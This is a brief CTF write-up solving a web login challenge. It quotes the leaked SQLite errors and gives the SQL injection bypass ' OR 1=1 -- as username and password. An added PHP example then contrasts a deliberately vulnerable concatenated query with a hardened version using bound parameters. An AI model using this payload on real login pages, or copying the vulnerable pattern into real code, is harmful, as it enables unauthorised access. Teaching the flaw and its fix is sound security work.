2022. 3. 31. 23:32ㆍCTF_Writeup/Web
Challenge URL: https://my-us3l355-w3b51t3.vishwactf.com/
Challenge description
I made this website having simple authentication used in it. But unfortunately I forgot the credentials. Can you help me to find the correct one ?
This challenge is easily solved with SQL injection.
Reference: What is SQL Injection? (SQL injection attack), noirstar.tistory.com
Warning: SQLite3::query(): Unable to prepare statement: 1, near "or": syntax error in /opt/app-root/src/index.php on line 55
Fatal error: Uncaught Error: Call to a member function fetchArray() on bool in /opt/app-root/src/index.php:56 Stack trace: #0 {main} thrown in /opt/app-root/src/index.php on line 56
GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List
User: ' OR 1=1 --
Pass: ' OR 1=1 --
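
Why the input above logs in, and how the login should be written instead, as an added example that is not the challenge's source (the writeup does not show it). The table, columns, account and function names are assumptions, chosen to match the `SQLite3::query()` and `fetchArray()` calls named in the error output.

```php
<?php
// Added example. Schema, account and function names are constructed assumptions.
ini_set('display_errors', '0');   // keep SQL errors and file paths out of responses

$db = new SQLite3(':memory:');
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, pw_hash TEXT)');
$ins = $db->prepare('INSERT INTO users VALUES (:u, :p, :h)');
$ins->bindValue(':u', 'admin', SQLITE3_TEXT);
$ins->bindValue(':p', 'constructed-secret', SQLITE3_TEXT);
$ins->bindValue(':h', password_hash('constructed-secret', PASSWORD_DEFAULT), SQLITE3_TEXT);
$ins->execute();

// Vulnerable pattern: user input becomes part of the SQL text, and the return
// value of query() is used unchecked. query() returns false when the statement
// does not parse, which is what produces "fetchArray() on bool".
function login_vulnerable(SQLite3 $db, string $user, string $pass): bool
{
    $sql = "SELECT * FROM users WHERE username = '$user' AND password = '$pass'";
    $res = $db->query($sql);
    return $res->fetchArray() !== false;
}

// Hardened form: input is bound as data, failures are checked and logged
// server-side, and the password is compared against a stored hash.
function login_hardened(SQLite3 $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE username = :u');
    if ($stmt === false) {
        error_log('login: prepare failed: ' . $db->lastErrorMsg());
        return false;
    }
    $stmt->bindValue(':u', $user, SQLITE3_TEXT);
    $res = $stmt->execute();
    if ($res === false) {
        error_log('login: execute failed: ' . $db->lastErrorMsg());
        return false;
    }
    $row = $res->fetchArray(SQLITE3_ASSOC);
    return $row !== false && password_verify($pass, $row['pw_hash']);
}

$input = "' OR 1=1 --";   // the User/Pass value from the writeup
foreach (['login_vulnerable', 'login_hardened'] as $fn) {
    printf("%-16s payload login: %s\n", $fn, var_export($fn($db, $input, $input), true));
}
printf("%-16s valid login:   %s\n", 'login_hardened',
    var_export(login_hardened($db, 'admin', 'constructed-secret'), true));
```

With bound parameters the same input is looked up as a literal username, so it matches no row and cannot change the structure of the query.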
